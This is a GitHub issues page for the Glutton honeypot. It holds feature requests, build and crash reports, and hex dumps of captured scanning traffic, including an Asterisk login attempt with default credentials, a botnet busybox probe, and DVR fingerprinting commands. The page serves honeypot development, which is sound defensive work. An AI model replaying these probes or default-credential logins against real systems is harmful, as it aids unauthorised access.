glutton's People

Contributors

0x4d31, codyprime, cstayyab, dkumiszhan, dpisano, furusiyya, gento, glaslos, hashcode55, kalyan-kumar, kung-foo, maikroservice, martypal2005, mhils, nassimabedi, simonwaldherr, synchroack, t3chn0m4g3


glutton's Issues

Configure Ports

Add support for a config file to whitelist and blacklist ports to handle/listen on.
It's going to be interesting if we can drop the connection in Glutton in a way that it looks like nothing is listening on that port.
Purpose is if you want to only listen on certain ports to make Glutton less obvious.

Asterisk Manager Interface

See here: http://the-asterisk-book.com/1.6/asterisk-manager-api.html
Example

DEBU[3273] [freki   ] new connection xxx:38244->5038 
DEBU[3273] [contable] registering xxx:38244->5038 
INFO[3281] [log.tcp ] xxx
00000000  41 63 74 69 6f 6e 3a 20  4c 6f 67 69 6e 0d 0a 55  |Action: Login..U|
00000010  73 65 72 6e 61 6d 65 3a  20 61 64 6d 69 6e 0d 0a  |sername: admin..|
00000020  53 65 63 72 65 74 3a 20  6d 61 6e 61 67 65 72 0d  |Secret: manager.|
00000030  0a 45 76 65 6e 74 73 3a  20 6f 66 66 0d 0a 0d 0a  |.Events: off....|
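
The dump above is one AMI action block: "Key: Value" lines ended by an empty line. The following Go code is an added example, not part of the issue or of Glutton's code, showing how a handler could split such payloads and record the login attempt; the names ParseAMI, AMIAction and LoginAttempt are hypothetical.

```go
package main

import (
	"bytes"
	"fmt"
	"strings"
)

// AMIAction holds one AMI message: header names (lower-cased) to values.
type AMIAction map[string]string

// ParseAMI splits a client payload into complete action blocks. Each block is
// a run of "Key: Value" lines ended by an empty line (CRLF CRLF). Bytes after
// the last terminator are returned as rest so the caller can wait for more.
func ParseAMI(payload []byte) (actions []AMIAction, rest []byte) {
	for {
		end := bytes.Index(payload, []byte("\r\n\r\n"))
		if end < 0 {
			return actions, payload
		}
		act := AMIAction{}
		for _, line := range strings.Split(string(payload[:end]), "\r\n") {
			kv := strings.SplitN(line, ":", 2)
			if len(kv) != 2 {
				continue // not a header line; skip it rather than drop the block
			}
			act[strings.ToLower(strings.TrimSpace(kv[0]))] = strings.TrimSpace(kv[1])
		}
		if len(act) > 0 {
			actions = append(actions, act)
		}
		payload = payload[end+4:]
	}
}

// LoginAttempt returns the credentials carried by a Login action, the fields
// a honeypot would record for this probe.
func LoginAttempt(a AMIAction) (user, secret string, ok bool) {
	if !strings.EqualFold(a["action"], "login") {
		return "", "", false
	}
	return a["username"], a["secret"], true
}

func main() {
	// Payload reassembled from the hex dump in the issue above.
	raw := []byte("Action: Login\r\nUsername: admin\r\nSecret: manager\r\nEvents: off\r\n\r\n")
	actions, rest := ParseAMI(raw)
	for _, a := range actions {
		if user, secret, ok := LoginAttempt(a); ok {
			fmt.Printf("AMI login attempt user=%q secret=%q\n", user, secret)
		}
	}
	fmt.Printf("%d unparsed byte(s)\n", len(rest))
}
```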

too many open files

I'm still having this issue:
[user.tcp] accept tcp [::]:5000: accept4: too many open files

Issue with freki

I tried to run the server.go from /app/server.go but I am getting an error in the freki package.

I had installed freki using command:
go get github.com/kung-foo/freki

Also tried:
go install golang.org/x/net/context

But same error while running

root@debian8template:/opt/go/src/github.com# go run /opt/go/src/github.com/mushorg/glutton/app/server.go 
kung-foo/freki/freki.go:4:2: cannot find package "context" in any of:
	/usr/lib/go/src/pkg/context (from $GOROOT)
	/opt/go/src/context (from $GOPATH)

Am I doing something wrong here?

Jabber support

DEBU[0177] [freki   ] new connection x.130:14898->5269
DEBU[0177] [contable] registering x.130:14898->5269
INFO[0178] [log.tcp ]
00000000  3c 3f 78 6d 6c 20 76 65  72 73 69 6f 6e 3d 27 31  |<?xml version='1|
00000010  2e 30 27 3f 3e 3c 73 74  72 65 61 6d 3a 73 74 72  |.0'?><stream:str|
00000020  65 61 6d 20 78 6d 6c 6e  73 3a 73 74 72 65 61 6d  |eam xmlns:stream|
00000030  3d 27 68 74 74 70 3a 2f  2f 65 74 68 65 72 78 2e  |='http://etherx.|
00000040  6a 61 62 62 65 72 2e 6f  72 67 2f 73 74 72 65 61  |jabber.org/strea|
00000050  6d 73 27 20 78 6d 6c 6e  73 3d 27 6a 61 62 62 65  |ms' xmlns='jabbe|
00000060  72 3a 63 6c 69 65 6e 74  27 20 78 6d 6c 3a 6c 61  |r:client' xml:la|
00000070  6e 67 3d 27 65 6e 2d 55  53 27 20 74 6f 3d 27 2e  |ng='en-US' to='.|
00000080  27 20 76 65 72 73 69 6f  6e 3d 27 31 2e 30 27 3e  |' version='1.0'>|

Fix the readme

Readme needs an update after we changed the core to Freki.

No ports.yml found

There is no ports.yml source file.

cp $GOPATH/src/github.com/mushorg/glutton/config/ports.yml /etc/glutton

root@debian8template:/# cp $GOPATH/src/github.com/mushorg/glutton/config/ports.yml /etc/glutton
cp: cannot stat ‘/opt/go/src/github.com/mushorg/glutton/config/ports.yml’: No such file or directory

glide install fails ... Cannot detect VCS

I did the previous steps in the new readme, but glide install is failing for me. I tried changing the VM, but got the same result.

root@beta2:~/gowork/src/github.com/mushorg/glutton# glide install
[INFO]	Downloading dependencies. Please wait...
[INFO]	--> Found desired version locally github.com/1lann/go-sip 68e86c65407ef8cf672ae38526e7f3d29944b94f!
[INFO]	--> Found desired version locally github.com/coreos/go-iptables 5463fbac3bcc6b990663941c2e12660d19f6b36d!
[INFO]	--> Found desired version locally github.com/docker/distribution fb0bebc4b64e3881cc52a2478d749845ed76d2a8!
[INFO]	--> Found desired version locally github.com/docker/engine-api 4290f40c056686fcaa5c9caf02eac1dde9315adf!
[INFO]	--> Found desired version locally github.com/docker/go-connections 9670439d95da2651d9dfc7acc5d2ed92d3f25ee6!
[INFO]	--> Found desired version locally github.com/docker/go-units 0dadbb0345b35ec7ef35e228dabb8de89a65bf52!
[INFO]	--> Found desired version locally github.com/google/gopacket b83f94714c36e30ce851be1d5a0a5226f9f1bca4!
[INFO]	--> Found desired version locally github.com/kung-foo/freki b6a126f46f7b0ce15cdc1d50df8d3626377ff7a7!
[INFO]	--> Found desired version locally github.com/Microsoft/go-winio fff283ad5116362ca252298cfc9b95828956d85d!
[INFO]	--> Found desired version locally github.com/opencontainers/go-digest aa2ec055abd10d26d539eb630a92241b781ce4bc!
[INFO]	--> Found desired version locally github.com/pkg/errors 645ef00459ed84a119197bfb8d8205042c6df63d!
[INFO]	--> Found desired version locally github.com/satori/go.uuid b061729afc07e77a8aa4fad0a2fd840958f1942a!
[INFO]	--> Found desired version locally github.com/sirupsen/logrus d26492970760ca5d33129d2d799e34be5c4782eb!
[INFO]	--> Found desired version locally github.com/Sirupsen/logrus d26492970760ca5d33129d2d799e34be5c4782eb!
[INFO]	--> Found desired version locally gopkg.in/yaml.v2 a5b47d31c556af34a302ce5d659e6fea44d90de0!
[INFO]	--> Fetching golang.org/x/net
[INFO]	--> Fetching golang.org/x/sys
[WARN]	Unable to checkout golang.org/x/sys
[ERROR]	Update failed for golang.org/x/sys: Cannot detect VCS
[WARN]	Unable to checkout golang.org/x/net
[ERROR]	Update failed for golang.org/x/net: Cannot detect VCS
[ERROR]	Failed to install: Cannot detect VCS
Cannot detect VCS

Fix error logging to be less noisy for port scans

Deployed latest glutton on a Digital Ocean droplet (no docker) and ran basic nmap scan (all TCP ports). Would expect to see the results as all ports open, but some ports did not respond and many "use of closed network connection" errors were logged:

[email protected]:~$ nmap g.g.g.g

Starting Nmap 6.40 ( http://nmap.org ) at 2017-11-17 04:46 GMT
Nmap scan report for g.g.g.g
Host is up (0.18s latency).
PORT      STATE    SERVICE
1/tcp     open     tcpmux
3/tcp     open     compressnet
4/tcp     open     unknown
6/tcp     open     unknown
7/tcp     open     echo
9/tcp     open     discard
13/tcp    open     daytime
17/tcp    open     qotd
19/tcp    open     chargen
20/tcp    open     ftp-data
21/tcp    open     ftp
22/tcp    open     ssh
23/tcp    open     telnet
24/tcp    open     priv-mail
25/tcp    open     smtp
26/tcp    open     rsftp
30/tcp    open     unknown
...

Logs:

2017/11/17 04:47:17 ERROR user.tcp: close tcp g.g.g.g:5000->n.n.n.n:40613: use of closed network connection
2017/11/17 04:47:17 ERROR user.tcp: close tcp g.g.g.g:5000->n.n.n.n:50191: use of closed network connection
2017/11/17 04:47:17 ERROR user.tcp: close tcp g.g.g.g:5000->n.n.n.n:56103: use of closed network connection
2017/11/17 04:47:17 ERROR user.tcp: close tcp g.g.g.g:5000->n.n.n.n:56748: use of closed network connection
2017/11/17 04:47:17 ERROR user.tcp: close tcp g.g.g.g:5000->n.n.n.n:35219: use of closed network connection
2017/11/17 04:47:17 ERROR user.tcp: close tcp g.g.g.g:5000->n.n.n.n:37463: use of closed network connection
2017/11/17 04:47:17 ERROR user.tcp: close tcp g.g.g.g:5000->n.n.n.n:50858: use of closed network connection
2017/11/17 04:47:17 ERROR user.tcp: close tcp g.g.g.g:5000->n.n.n.n:41272: use of closed network connection

Invisible Glutton crash/panic

I'm running Glutton directly on my server. Every 1-2 days the server becomes unreachable. I assume Glutton crashed and didn't clean up the iptables rules, locking me out from the machine. I have to reboot the box in order to access it again. I tail stderr to a file to see if there is any output, so far without luck. I assume we never execute https://github.com/kung-foo/freki/blob/master/freki.go#L245 on a panic.

Add Docker build check to Travis

Currently the Travis tests do not check if the docker image builds successfully. There are two ways that I can see this going. The first is to build the docker image and then run the unit test on it too and the other is to just build the docker image.

Create a docker container

  • Create a Dockerfile
  • Configure Travis to build and test the container
  • Push successful builds to the docker Hub

The container should be as minimal as possible. I guess either Alpine or even smaller.

Default handler

I'd like to have a handler that I can assign to ports:

ports:
  21:
    default

Default handler should accept the connection and read the package payload. This might trigger additional packages.

Parse MCTP

DEBU[0648] [freki ] new connection 47.X.X.X:56695->9000
DEBU[0648] [contable] registering 47.X.X.X:56695->9000
DEBU[0648] [glutton ] new connection: 47.X.X.X:56695 -> 9000

00000000  52 45 4d 4f 54 45 20 48  49 5f 53 52 44 4b 5f 44  |REMOTE HI_SRDK_D|
00000010  45 56 5f 47 65 74 48 64  64 49 6e 66 6f 20 4d 43  |EV_GetHddInfo MC|
00000020  54 50 2f 31 2e 30 0d 0a  43 53 65 71 3a 31 37 33  |TP/1.0..CSeq:173|
00000030  0d 0a 41 63 63 65 70 74  3a 74 65 78 74 2f 48 44  |..Accept:text/HD|
00000040  50 0d 0a 43 6f 6e 74 65  6e 74 2d 54 79 70 65 3a  |P..Content-Type:|
00000050  74 65 78 74 2f 48 44 50  0d 0a 46 75 6e 63 2d 56  |text/HDP..Func-V|
00000060  65 72 73 69 6f 6e 3a 30  78 31 30 0d 0a 43 6f 6e  |ersion:0x10..Con|
00000070  74 65 6e 74 2d 4c 65 6e  67 74 68 3a 31 35 0d 0a  |tent-Length:15..|
00000080  0d 0a 53 65 67 6d 65 6e  74 2d 4e 75 6d 3a 30 0d  |..Segment-Num:0.|
00000090  0a                                                |.|

Glutton will not start when you pass interface parameter

When you try and start Glutton right now with an interface parameter it throws the following error:

  _____ _       _   _
 / ____| |     | | | |
| |  __| |_   _| |_| |_ ___  _ __
| | |_ | | | | | __| __/ _ \| '_ \
| |__| | | |_| | |_| || (_) | | | |
 \_____|_|\__,_|\__|\__\___/|_| |_|

	
panic: interface conversion: interface is string, not bool

goroutine 1 [running]:
panic(0x980a40, 0xc42138cc00)
	/usr/local/go/src/runtime/panic.go:500 +0x1a1
github.com/mushorg/glutton.New(0xc421375c20, 0x0, 0x0, 0x0)
	/go/src/github.com/mushorg/glutton/glutton.go:42 +0x2b5
main.main()
	/go/src/github.com/mushorg/glutton/app/server.go:56 +0x19b

From what I have been able to tell this might have started in PR #91.

Parse iSCSI

On port 3260

00000000  03 81 00 00 00 00 00 5f  40 00 01 37 00 00 00 00  |......._@..7....|
00000010  00 00 00 01 00 01 00 00  00 00 00 01 00 00 00 01  |................|
00000020  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000030  49 6e 69 74 69 61 74 6f  72 4e 61 6d 65 3d 69 71  |InitiatorName=iq|
00000040  6e 2e 31 39 39 31 2d 30  35 2e 63 6f 6d 2e 6d 69  |n.1991-05.com.mi|
00000050  63 72 6f 73 6f 66 74 3a  6e 6d 61 70 5f 69 73 63  |crosoft:nmap_isc|
00000060  73 69 5f 70 72 6f 62 65  00 53 65 73 73 69 6f 6e  |si_probe.Session|
00000070  54 79 70 65 3d 44 69 73  63 6f 76 65 72 79 00 41  |Type=Discovery.A|
00000080  75 74 68 4d 65 74 68 6f  64 3d 4e 6f 6e 65 00 00  |uthMethod=None..|

make build error

Hi all,

Has anyone encountered this compilation issue with the 'make build' command for the latest commits?
I am trying to compile Glutton on ubuntu 16.04.

test@test:/opt/go/src/github.com/mushorg/glutton$ sudo make clean
rm -rf bin/
test@test:/opt/go/src/github.com/mushorg/glutton$ sudo make build
go build -o $GOPATH/bin/server app/server.go
// # command-line-arguments
app/server.go:75: too many arguments in call to glutton.New
app/server.go:77: gtn.Start undefined (type *glutton.Glutton has no field or method Start)
Makefile:6: recipe for target 'build' failed
make: *** [build] Error 2
test@test:/opt/go/src/github.com/mushorg/glutton$ go version
go version go1.7.1 linux/amd64
test@test:/opt/go/src/github.com/mushorg/glutton$ 

Any idea to solve this? Thanks!

Add cli for management

Cli provides a very easy way to register, order and categorize commands and the optional flags required to run a command-line application. The source of input can also be JSON or TOML. We can register init and exit code for our application. It provides a context that travels to all handler functions of the application, so flags can be accessed and set at any level of the application with the help of the context. The context can be used to track and shut down goroutines.

Support for DICOM parsing

See DICOM: https://en.wikipedia.org/wiki/DICOM
Sample request:

00000000  01 00 00 00 01 00 00 01  00 00 41 4e 59 2d 53 43  |..........ANY-SC|
00000010  50 20 20 20 20 20 20 20  20 20 46 49 4e 44 53 43  |P         FINDSC|
00000020  55 20 20 20 20 20 20 20  20 20 00 00 00 00 00 00  |U         ......|
00000030  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000040  00 00 00 00 00 00 00 00  00 00 10 00 00 15 31 2e  |..............1.|
00000050  32 2e 38 34 30 2e 31 30  30 30 38 2e 33 2e 31 2e  |2.840.10008.3.1.|
00000060  31 2e 31 20 00 00 61 01  00 ff 00 30 00 00 16 31  |1.1 ..a....0...1|
00000070  2e 32 2e 38 34 30 2e 31  30 30 30 38 2e 35 2e 31  |.2.840.10008.5.1|
00000080  2e 34 2e 33 31 40 00 00  13 31 2e 32 2e 38 34 30  |.4.31@...1.2.840|
00000090  2e 31 30 30 30 38 2e 31  2e 32 2e 31 40 00 00 13  |.10008.1.2.1@...|
000000a0  31 2e 32 2e 38 34 30 2e  31 30 30 30 38 2e 31 2e  |1.2.840.10008.1.|
000000b0  32 2e 32 40 00 00 11 31  2e 32 2e 38 34 30 2e 31  |2.2@...1.2.840.1|
000000c0  30 30 30 38 2e 31 2e 32  50 00 00 3a 51 00 00 04  |0008.1.2P..:Q...|
000000d0  00 00 40 00 52 00 00 1b  31 2e 32 2e 32 37 36 2e  |..@.R...1.2.276.|
000000e0  30 2e 37 32 33 30 30 31  30 2e 33 2e 30 2e 33 2e  |0.7230010.3.0.3.|
000000f0  36 2e 30 55 00 00 0f 4f  46 46 49 53 5f 44 43 4d  |6.0U...OFFIS_DCM|
00000100  54 4b 5f 33 36 30                                 |TK_360|

stdout connection info

Right now the package is dropped if there is no proxy configured for that port. I'd like to see at least a message with the remote IP address and the target port. Are we logging those connection attempts? If not, we should also have a log entry with the same information.

Update README with IPTABLES information

How to redirect all traffic to the port we are listening on.
How to set the sshd port to a different port.
How to except the sshd port from the redirect so we can connect to the machine.

satori

INFO[20219] [telnet  ] recv: "/bin/busybox satori\x00\r\n" 
INFO[20220] [telnet  ] send: "> "

Seeing lots of those and no further stage. Ideas?

runtime error

I have this error many times.

2017/11/28 18:31:16 DEBUG [freki ] new TCP connection x.x.x.x:x->22
2017/11/28 18:31:16 DEBUG [contable] registering x.x.x.x:x->22
2017/11/28 18:31:16 ERROR [user.tcp] panic: runtime error: invalid memory address or nil pointer dereference
2017/11/28 18:31:16 ERROR [user.tcp] stacktrace:
goroutine 21245 [running]:
runtime/debug.Stack(0xc42000e3f0, 0xa89c2a, 0x15)
/usr/local/go/src/runtime/debug/stack.go:24 +0x79
github.com/mushorg/glutton/vendor/github.com/kung-foo/freki.(*UserConnServer).Start.func1.1(0xfc1960, 0xc42000e5f8)
/x/x/x/x/src/github.com/mushorg/glutton/vendor/github.com/kung-foo/freki/userconnhandler_tcp.go:66 +0xda
panic(0x9c4ee0, 0xfa6f90)
/usr/local/go/src/runtime/panic.go:489 +0x2cf
github.com/mushorg/glutton.(*sshProxy).handle(0x0, 0xfbd5c0, 0xc422b9bc80, 0xfc1960, 0xc42000e5f8, 0x0, 0x0)
/x/x/x/x/src/github.com/mushorg/glutton/proxy_ssh.go:131 +0xb2
github.com/mushorg/glutton.(*Glutton).mapProtocolHandlers.func9(0xfbd5c0, 0xc422b9bc80, 0xfc1960, 0xc42000e5f8, 0xc42141e808, 0x0)
/x/x/x/x/src/github.com/mushorg/glutton/protocols.go:51 +0x56
github.com/mushorg/glutton.(*Glutton).registerHandlers.func1(0xfc1960, 0xc42000e5f8, 0xc422b9b950, 0xc42000e5f8, 0x0)
/x/x/x/x/src/github.com/mushorg/glutton/glutton.go:214 +0x3d3
github.com/mushorg/glutton/vendor/github.com/kung-foo/freki.(*UserConnServer).Start.func1(0xfc1960, 0xc42000e5f8, 0xc421430300, 0xc422b9b950, 0xc4214302e0)
/x/x/x/x/src/github.com/mushorg/glutton/vendor/github.com/kung-foo/freki/userconnhandler_tcp.go:70 +0x7c
created by github.com/mushorg/glutton/vendor/github.com/kung-foo/freki.(*UserConnServer).Start
/x/x/x/x/src/github.com/mushorg/glutton/vendor/github.com/kung-foo/freki/userconnhandler_tcp.go:74 +0x32c

too many open files

Glutton eventually fails with:

[user.tcp] accept tcp [::]:5000: accept4: too many open files

runtime error: invalid memory address or nil pointer dereference

I ran glutton and tried to connect from localhost with telnet; it crashed showing the following error.
My VM's OS is Debian GNU/Linux 8.

root@debian8template:~# go run /opt/go/src/github.com/mushorg/glutton/app/server.go  -log /tmp/glutton.log

  _____ _       _   _
 / ____| |     | | | |
| |  __| |_   _| |_| |_ ___  _ __
| | |_ | | | | | __| __/ _ \| '_ \
| |__| | | |_| | |_| || (_) | | | |
 \_____|_|\__,_|\__|\__\___/|_| |_|

	
INFO[0000] [glutton ] Loading rules from: /etc/glutton/rules.yaml 
INFO[0000] [glutton ] Rules: [Rule: tcp dst port 5001 Rule: tcp dst port 23 or port 2323 or port 23231 Rule: tcp] 
INFO[0000] [freki   ] starting freki on [x.x.x.55]  
INFO[0000] [freki   ] starting proxy.tcp on 6000        
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x0 pc=0x404c50]

goroutine 27 [running]:
panic(0x753ac0, 0xc4200120b0)
	/usr/local/go/src/runtime/panic.go:500 +0x1a1
main.main.func3.1(0xc4212e4c80, 0xc421305580, 0xc42131ce80, 0xc42133ef40, 0xbb3440, 0xc420024000)
	/opt/go/src/github.com/mushorg/glutton/app/server.go:161 +0x200
created by main.main.func3
	/opt/go/src/github.com/mushorg/glutton/app/server.go:194 +0x14c
exit status 2

Tarpit

Add capability to add a delay to responses. Delay should be random in range. Global or per port and transport layer.

fgrep XDVR (cctv/dvr)

@gento I see a bunch of those lately:
fgrep XDVR /mnt/mtd/dep2.sh\x00
After that there is no additional step. I assume they expect a specific response payload.

Proxy Handler

Add a handler able to proxy a request to a local or remote service. For example redirecting ssh requests to a Kippo instance.
A yaml configuration file that has a PORT->IP:PORT mapping. When you get a connection, get the data, create a TCP client, send it to the proxy target, fetch the response and send it back to the attacker.
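
The flow requested in this issue, as an added Go example that is not part of the issue or of Glutton's code. Relay, Dialer and the maxSession bound are hypothetical names and choices; the mapping is passed in as a map rather than read from YAML, and the session deadline is an added safeguard so a stalled peer cannot hold both sockets open indefinitely.

```go
package main

import (
	"fmt"
	"io"
	"net"
	"time"
)

// Dialer opens the connection to the proxy target (net.Dial in production).
type Dialer func(network, addr string) (net.Conn, error)

// Relay proxies one accepted connection to the target mapped to dstPort.
// targets is the PORT -> IP:PORT mapping; maxSession bounds how long the
// session may keep its two sockets open. It returns the bytes relayed to the
// target (sent) and back to the remote peer (received).
func Relay(client net.Conn, dstPort int, targets map[int]string, dial Dialer, maxSession time.Duration) (sent, received int64, err error) {
	defer client.Close()
	addr, ok := targets[dstPort]
	if !ok {
		return 0, 0, fmt.Errorf("no proxy target configured for port %d", dstPort)
	}
	upstream, err := dial("tcp", addr)
	if err != nil {
		return 0, 0, fmt.Errorf("dial %s: %w", addr, err)
	}
	defer upstream.Close()

	deadline := time.Now().Add(maxSession)
	client.SetDeadline(deadline)
	upstream.SetDeadline(deadline)

	done := make(chan int64, 1)
	go func() {
		n, _ := io.Copy(upstream, client) // remote peer -> target
		done <- n
	}()
	received, _ = io.Copy(client, upstream) // target -> remote peer
	client.Close()                           // unblock the other copy
	upstream.Close()
	sent = <-done
	return sent, received, nil
}

func main() {
	// Constructed demo: in-memory pipes stand in for the accepted socket and
	// the target service; 192.0.2.10 is a documentation address.
	remote, accepted := net.Pipe()
	toTarget, target := net.Pipe()
	go func() { // stub target: read the request, answer, hang up
		buf := make([]byte, 64)
		n, _ := target.Read(buf)
		fmt.Fprintf(target, "echo:%s", buf[:n])
		target.Close()
	}()
	go func() { // stub remote peer
		remote.Write([]byte("ping"))
		io.Copy(io.Discard, remote)
	}()
	dial := func(_, _ string) (net.Conn, error) { return toTarget, nil }
	sent, received, err := Relay(accepted, 22, map[int]string{22: "192.0.2.10:2222"}, dial, time.Second)
	fmt.Println(sent, received, err)
}
```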

Parse Java Debug Wire Protocol (JDWP)

DEBU[1386] [freki ] new connection 188.X.X.X:47651->5005
DEBU[1386] [contable] registering 188.X.X.X:47651->5005
DEBU[1386] [glutton ] new connection: 188.X.X.X:47651 -> 5005

00000000  4a 44 57 50 2d 48 61 6e  64 73 68 61 6b 65        |JDWP-Handshake|
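
The parsing requests above (Asterisk Manager Interface, Jabber, MCTP, iSCSI, DICOM, JDWP) all start from recognising the first payload. The following Go code is an added example, not part of these issues or of Glutton's code: a hypothetical Classify function whose signatures are derived only from the dumps shown on this page, returning one detail worth logging per protocol.

```go
package main

import (
	"bytes"
	"encoding/binary"
	"fmt"
	"strings"
)

// Classify names the protocol of a connection's first payload and returns one
// identifying detail. It is a heuristic built from the payloads in the issues
// above, not a full parser for any of these protocols.
func Classify(p []byte) (proto, detail string) {
	line := p
	if i := bytes.Index(p, []byte("\r\n")); i >= 0 {
		line = p[:i]
	}
	fields := strings.Fields(string(line))
	switch {
	case bytes.HasPrefix(p, []byte("JDWP-Handshake")):
		return "jdwp", ""
	case bytes.HasPrefix(p, []byte("Action:")):
		return "asterisk-ami", strings.TrimSpace(string(line[len("Action:"):]))
	case bytes.HasPrefix(p, []byte("<?xml")) && bytes.Contains(p, []byte("jabber:")):
		return "xmpp", ""
	// Request line of the form "<verb> <command> MCTP/<version>".
	case len(fields) == 3 && strings.HasPrefix(fields[2], "MCTP/"):
		return "mctp", fields[0] + " " + fields[1]
	// DICOM A-ASSOCIATE-RQ: PDU type 0x01, reserved 0x00, 4-byte length,
	// protocol version with bit 0 set, then 16-byte called/calling AE titles.
	case len(p) >= 42 && p[0] == 0x01 && p[1] == 0x00 && binary.BigEndian.Uint16(p[6:8])&1 == 1:
		return "dicom", strings.TrimSpace(string(p[10:26]))
	// iSCSI Login Request: opcode 0x03 in the low 6 bits of byte 0, a 48-byte
	// header, then NUL-separated key=value text.
	case len(p) > 48 && p[0]&0x3f == 0x03:
		for _, kv := range bytes.Split(p[48:], []byte{0}) {
			if bytes.HasPrefix(kv, []byte("InitiatorName=")) {
				return "iscsi", string(kv[len("InitiatorName="):])
			}
		}
	}
	return "unknown", ""
}

func main() {
	// Constructed inputs mirroring the first bytes of the dumps above.
	samples := [][]byte{
		[]byte("JDWP-Handshake"),
		[]byte("REMOTE HI_SRDK_DEV_GetHddInfo MCTP/1.0\r\nCSeq:173\r\n"),
		append([]byte{1, 0, 0, 0, 1, 0, 0, 1, 0, 0}, fmt.Sprintf("%-16s%-16s", "ANY-SCP", "FINDSCU")...),
	}
	for _, s := range samples {
		proto, detail := Classify(s)
		fmt.Printf("%-8s %q\n", proto, detail)
	}
}
```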
